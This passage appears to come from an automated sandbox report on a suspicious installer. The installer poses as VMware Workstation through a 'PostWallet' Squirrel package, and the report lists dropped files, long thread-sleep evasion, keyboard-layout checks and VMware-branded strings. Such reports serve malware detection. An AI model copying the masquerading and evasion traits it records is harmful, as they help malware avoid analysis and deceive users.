          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile opened / queried: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1784Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 790Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-35717
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeAPI coverage: 1.7 %
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6976Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7040Thread sleep count: 1784 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7040Thread sleep count: 790 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00415080 FindFirstFileW,FindClose,12_2_00415080
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_00619ED6 VirtualQuery,GetSystemInfo,0_2_00619ED6
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_VMCI
          Source: FilePost?a.exe.2.drBinary or memory string: CompanyNameVMware, Inc.b
          Source: Update.exe, 00000002.00000002.1680892254.000000000291A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exeBinary or memory string: \\.\pipe\vmware-authdpipe
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetWriteAccess
          Source: FilePost?a.exe.2.drBinary or memory string: http://www.vmware.com/0
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: name="VMware.VMware.vmauthd"
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetNumaNode
          Source: FilePost?a.exe.2.drBinary or memory string: PANIC: %s599 vmware-authd PANIC: %s
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: Rlib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetTags
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSPurge
          Source: FilePost?a.exe.2.drBinary or memory string: 17.0.0 build-20800274VMware Workstation%s Authentication Daemon Version %u.%u for %s %s
          Source: FilePost?a.exe.2.drBinary or memory string: noreply@vmware.com0
          Source: FilePost?a.exe.2.drBinary or memory string: vmware
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_VMCISetFiltering
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSPurge
          Source: Squirrel-Install.log.2.drBinary or memory string: [07/03/24 10:36:00] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryHGFS
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Authorization Service
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetWriteAccess
          Source: Squirrel-Install.log.2.drBinary or memory string: [07/03/24 10:36:00] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: Authorization and authentication service for starting and accessing virtual machinesVMware Authorization ServiceVMAuthdServiceSuccessfully registered %s.
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostDefaultCase
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk2y
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-hostd
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetFollowSymlinks
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostPath
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstationp^y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_HGFS
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx-debug.exe
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware-authd.exep^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: File_CreateDirectoryvmwarebase.DLL)_strdup
          Source: Squirrel-Install.log.2.drBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: security.host.ruisslvmwareauthd.policy.allowRCForReadvmauthd.startupTimeoutgetpeername failed: %d tid %d
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetFiltering
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPresent
          Source: Update.exe, 00000002.00000002.1680892254.000000000283A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll@
          Source: FilePost?a.exe.2.drBinary or memory string: \\.\pipe\vmware-authdpipeCreateNamedPipe failed: %s (%d)
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetEnabled
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.J
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx.exe
          Source: FilePost?a.exe, 00000007.00000002.4089346072.00000000031AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLL
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostDefaultCase
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetReadAccess
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: VMware
          Source: Main.dll.7.drBinary or memory string: \VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: <description>"VMware Authorization Service"</description>
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetGuestName
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx.exe%s%c..%c%svmware-vmx-debug.exevmware-vmx-stats.exeNo ticket found
          Source: FilePost?a.exe.2.drBinary or memory string: VMware, Inc.1!0
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_VMCI
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVMwareGroupSid
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A92C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A901000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A97E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FilePost?a.exe.2.drBinary or memory string: VMware, Inc.1
          Source: rundll32.exe, 0000000C.00000002.4093722104.000001A76AA94000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCan't write shortcut: C:\Users\user\Desktop\VMware Workstation.lnkx.}
          Source: FilePost?a.exe.2.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb--
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk2y
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.2.drBinary or memory string: vmwarebase.DLL
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_GetSize
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetExpiration
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /LIB/NET48/VMWAREBASE.DLL
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware, Inc.
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Do
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetReadAccess
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.p^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ~Can't write shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnkx.}
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ListenVMCI
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Server Console
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\VMware Workstation.lnkc.
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ConnectVMCI
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkx.}
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetEnabled
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Workstation
          Source: Update.exe, 00000002.00000002.1680892254.000000000291A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib/net48/vmwarebase.dll0y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetPresent
          Source: FilePost?a.exe.2.drBinary or memory string: OriginalFilenamevmware-authd.exeF
          Source: FilePost?a.exe.2.drBinary or memory string: : SSL RequiredNFCSSL supported/tServerDaemonProtocol:SOAPVMware%s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s%sError retrieving thumbprintInvalid arguments to '%s%s'Login failed: token key authentication not allowed.GET TOKEN KEY failed: got %s
          Source: Update.exe, 00000002.00000002.1680377944.0000000000A19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnknkI
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnkx.}
          Source: FilePost?a.exeBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Authorization Servicep^y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostPath
          Source: FilePost?a.exe.2.drBinary or memory string: http://www.vmware.com/0/
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetFollowSymlinks
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetID
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncX
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetUnrestricted
          Source: FilePost?a.exe.2.drBinary or memory string: nfcnfcsslvmware-hostdPROXY service %s not found.USER too long.Password required for %s.Login with USER first.InSeCuRePassword not understood.User %s logged in.LOGIN FAILURE from %.128s, %s
          Source: FilePost?a.exe.2.drBinary or memory string: ProductNameVMware WorkstationP
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_HGFS
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib\net48\vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1998-2022 VMware, Inc.p^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: FileDescriptionVMware Authorization ServiceL
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetGuestName
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryVMCI
          Source: FilePost?a.exe.2.drBinary or memory string: 1998-2022 VMware, Inc.J
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Undo
          Source: Update.exe, 00000002.00000002.1680892254.000000000283A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWa
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx-stats.exe
          Source: Squirrel-Install.log.2.drBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetTags
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPciSlotNumber
